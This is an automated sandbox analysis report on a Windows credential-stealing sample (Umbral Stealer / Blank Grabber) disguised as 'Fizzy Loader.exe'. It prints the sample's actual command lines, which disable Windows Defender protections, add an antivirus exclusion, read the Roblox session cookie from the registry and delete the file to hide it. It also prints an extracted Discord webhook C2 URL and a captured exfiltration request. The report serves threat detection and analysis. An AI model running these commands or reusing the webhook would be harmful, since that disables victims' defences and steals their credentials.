Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Fizzy Loader.exe

Overview

General Information

Sample name:Fizzy Loader.exe
Analysis ID:1582592
MD5:b56af795f8b7edc6f35a9e905921ed0e
SHA1:c82cb0088bc9c93fd9a491ad278f410d44265a4d
SHA256:46a67cdc899f61ccb6324d187d56b389f720d72beb02594fd60fdc4a8ca62ab4
Tags:exeUmbralStealeruser-aachum
Infos:

Detection

Blank Grabber, Umbral Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Blank Grabber
Yara detected Umbral Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Drops PE files to the startup folder
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies the hosts file
Self deletion via cmd or bat file
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Uses attrib.exe to hide files
Uses ping.exe to check the status of other devices and networks
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Fizzy Loader.exe (PID: 1708 cmdline: "C:\Users\user\Desktop\Fizzy Loader.exe" MD5: B56AF795F8B7EDC6F35A9E905921ED0E)
    • WMIC.exe (PID: 1996 cmdline: "wmic.exe" csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 1440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 5080 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\Fizzy Loader.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • conhost.exe (PID: 6656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5688 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Fizzy Loader.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 4568 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 6156 cmdline: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1892 cmdline: "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 428 cmdline: "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 6552 cmdline: "wmic.exe" os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 3136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 4308 cmdline: "wmic.exe" computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 3720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7156 cmdline: "wmic.exe" csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 5000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1308 cmdline: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 432 cmdline: "wmic" path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 6428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3560 cmdline: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\Fizzy Loader.exe" && pause MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 5656 cmdline: ping localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
  • cleanup

Malware Configuration

Threatname: Umbral Stealer

{"C2 url": "https://discord.com/api/webhooks/1323224754576166912/ngAQr5IRg8PVqlg_GePwPe46g-WcVmFR7-gQu1RH44lVF1JX9hv6jSy8rNgxBAU6LxYx", "Version": "v1.3"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Fizzy Loader.exeJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
    Fizzy Loader.exeJoeSecurity_UmbralStealerYara detected Umbral StealerJoe Security
      Fizzy Loader.exeINDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDeviceDetects executables attemping to enumerate video devices using WMIditekSHen
      • 0x31870:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
      • 0x319f6:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
      • 0x31a92:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scrJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scrJoeSecurity_UmbralStealerYara detected Umbral StealerJoe Security
          C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scrINDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDeviceDetects executables attemping to enumerate video devices using WMIditekSHen
          • 0x31870:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
          • 0x319f6:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
          • 0x31a92:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000000.00000000.1996507067.00000172AED82000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
            00000000.00000000.1996507067.00000172AED82000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_UmbralStealerYara detected Umbral StealerJoe Security
              00000000.00000002.2624137126.00000172B0CE9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                00000000.00000002.2624137126.00000172B0BBD000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                  00000000.00000002.2624137126.00000172B0BBD000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 3 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    0.0.Fizzy Loader.exe.172aed80000.0.unpackJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                      0.0.Fizzy Loader.exe.172aed80000.0.unpackJoeSecurity_UmbralStealerYara detected Umbral StealerJoe Security
                        0.0.Fizzy Loader.exe.172aed80000.0.unpackINDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDeviceDetects executables attemping to enumerate video devices using WMIditekSHen
                        • 0x31870:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
                        • 0x319f6:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
                        • 0x31a92:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Fizzy Loader.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Fizzy Loader.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Fizzy Loader.exe", ParentImage: C:\Users\user\Desktop\Fizzy Loader.exe, ParentProcessId: 1708, ParentProcessName: Fizzy Loader.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Fizzy Loader.exe', ProcessId: 5688, ProcessName: powershell.exe
                        Sigma detected: Powershell Defender Disable Scan Feature
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, CommandLine: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Fizzy Loader.exe", ParentImage: C:\Users\user\Desktop\Fizzy Loader.exe, ParentProcessId: 1708, ParentProcessName: Fizzy Loader.exe, ProcessCommandLine: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, ProcessId: 6156, ProcessName: powershell.exe
                        Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
                        Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\wbem\WMIC.exe, SourceProcessId: 4308, StartAddress: C76632B0, TargetImage: C:\Windows\System32\conhost.exe, TargetProcessId: 4308
                        Sigma detected: Suspicious Startup Folder Persistence
                        Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\Fizzy Loader.exe, ProcessId: 1708, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ukUGV.scr
                        Sigma detected: Powershell Defender Exclusion
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Fizzy Loader.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Fizzy Loader.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Fizzy Loader.exe", ParentImage: C:\Users\user\Desktop\Fizzy Loader.exe, ParentProcessId: 1708, ParentProcessName: Fizzy Loader.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Fizzy Loader.exe', ProcessId: 5688, ProcessName: powershell.exe
                        Sigma detected: SCR File Write Event
                        Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\Fizzy Loader.exe, ProcessId: 1708, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ukUGV.scr
                        Sigma detected: Startup Folder File Write
                        Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\Fizzy Loader.exe, ProcessId: 1708, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ukUGV.scr
                        Sigma detected: Suspicious Screensaver Binary File Creation
                        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\Fizzy Loader.exe, ProcessId: 1708, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ukUGV.scr
                        Sigma detected: Non Interactive PowerShell Process Spawned
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Fizzy Loader.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Fizzy Loader.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Fizzy Loader.exe", ParentImage: C:\Users\user\Desktop\Fizzy Loader.exe, ParentProcessId: 1708, ParentProcessName: Fizzy Loader.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Fizzy Loader.exe', ProcessId: 5688, ProcessName: powershell.exe

                        Suricata Signatures

                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-31T00:50:52.056252+010020455931A Network Trojan was detected192.168.2.549939162.159.138.232443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-31T00:50:28.592541+010028033053Unknown Traffic192.168.2.549807208.95.112.180TCP

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus / Scanner detection for submitted sample
                        Source: Fizzy Loader.exeAvira: detected
                        Antivirus detection for dropped file
                        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scrAvira: detection malicious, Label: HEUR/AGEN.1307507
                        Found malware configuration
                        Source: Fizzy Loader.exeMalware Configuration Extractor: Umbral Stealer {"C2 url": "https://discord.com/api/webhooks/1323224754576166912/ngAQr5IRg8PVqlg_GePwPe46g-WcVmFR7-gQu1RH44lVF1JX9hv6jSy8rNgxBAU6LxYx", "Version": "v1.3"}
                        Multi AV Scanner detection for dropped file
                        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scrReversingLabs: Detection: 73%
                        Multi AV Scanner detection for submitted file
                        Source: Fizzy Loader.exeReversingLabs: Detection: 73%
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                        Machine Learning detection for dropped file
                        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scrJoe Sandbox ML: detected
                        Machine Learning detection for sample
                        Source: Fizzy Loader.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeCode function: 0_2_00007FF8491036AE CryptUnprotectData,0_2_00007FF8491036AE
                        Source: Fizzy Loader.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                        Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.5:49939 version: TLS 1.2
                        Source: Fizzy Loader.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                        Networking

                        barindex
                        Suricata IDS alerts for network traffic
                        Source: Network trafficSuricata IDS: 2045593 - Severity 1 - ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST) : 192.168.2.5:49939 -> 162.159.138.232:443
                        C2 URLs / IPs found in malware configuration
                        Source: Malware configuration extractorURLs: https://discord.com/api/webhooks/1323224754576166912/ngAQr5IRg8PVqlg_GePwPe46g-WcVmFR7-gQu1RH44lVF1JX9hv6jSy8rNgxBAU6LxYx
                        Uses ping.exe to check the status of other devices and networks
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.com
                        Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                        Source: Joe Sandbox ViewIP Address: 162.159.138.232 162.159.138.232
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: unknownDNS query: name: ip-api.com
                        Source: unknownDNS query: name: ip-api.com
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49807 -> 208.95.112.1:80
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.com
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
                        Source: global trafficDNS traffic detected: DNS query: ip-api.com
                        Source: global trafficDNS traffic detected: DNS query: discord.com
                        Source: unknownHTTP traffic detected: POST /api/webhooks/1323224754576166912/ngAQr5IRg8PVqlg_GePwPe46g-WcVmFR7-gQu1RH44lVF1JX9hv6jSy8rNgxBAU6LxYx HTTP/1.1Accept: application/jsonUser-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17Content-Type: application/json; charset=utf-8Host: discord.comContent-Length: 940Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Dec 2024 23:50:51 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735602653x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sp9Xcu7jb8Q9TDFkNuyBO0qkdajgnAtBb3bX4ito3vUfs%2FksigpR1ayZMAFn8g9EekmaUitIT%2BBNEubbCHXb7TkaClq5s7zogJ%2BkBhMrsAPJMeIbueqSqYNVIa8N"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=00cd115a1a74109f9fe413390f3319ad8bb28a98-1735602651; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=s_12375XKPSx0UJ_BaiP2SV1hCsiVbbEJ1oivB0yLQs-1735602651904-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8fa5ef3d8bec5e74-EWR{"message": "Unknown Webhook", "code": 10015}
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Dec 2024 23:50:53 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735602654x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M3sFzqoe8yR%2FjHoxNFvxHpwyMrJIJ3N3abOydo%2FwysoygHPEGkIUD1tZAEr%2FMwcB9n0ozg4B6R7vHwken%2Ftia5kGsgqjLNPZ4iQ7Hx2bKqehRdraR9S34%2Fs30d8I"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Server: cloudflareCF-RAY: 8fa5ef433d397c84-EWR{"message": "Unknown Webhook", "code": 10015}
                        Source: powershell.exe, 0000000E.00000002.2341533446.000002056E05D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0CD0000.00000004.00000800.00020000.00000000.sdmp, Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0CE9000.00000004.00000800.00020000.00000000.sdmp, Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0D0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://discord.com
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0BBD000.00000004.00000800.00020000.00000000.sdmp, Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0BA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                        Source: Fizzy Loader.exe, ukUGV.scr.0.drString found in binary or memory: http://ip-api.com/json/?fields=225545
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0BBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545P
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0BA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                        Source: Fizzy Loader.exe, ukUGV.scr.0.drString found in binary or memory: http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-
                        Source: powershell.exe, 00000006.00000002.2087596667.0000027715CA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2203387646.000001D070295000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2147361329.000001D061A9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2203387646.000001D070152000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2319277381.000002051007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2228868697.00000205019B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2319277381.00000205101B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2545198762.000001EACCECD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2405447937.000001EABE718000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2545198762.000001EACD004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: powershell.exe, 00000016.00000002.2405447937.000001EABE6BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 00000006.00000002.2065728225.0000027705E59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0B41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2065728225.0000027705C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2107422944.000001CC0F8AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2147361329.000001D0600E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2228868697.0000020500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2405447937.000001EABCE51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000006.00000002.2065728225.0000027705E59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: powershell.exe, 0000000B.00000002.2147361329.000001D061707000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2228868697.0000020501793000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2405447937.000001EABE2F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                        Source: powershell.exe, 00000016.00000002.2405447937.000001EABE6BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
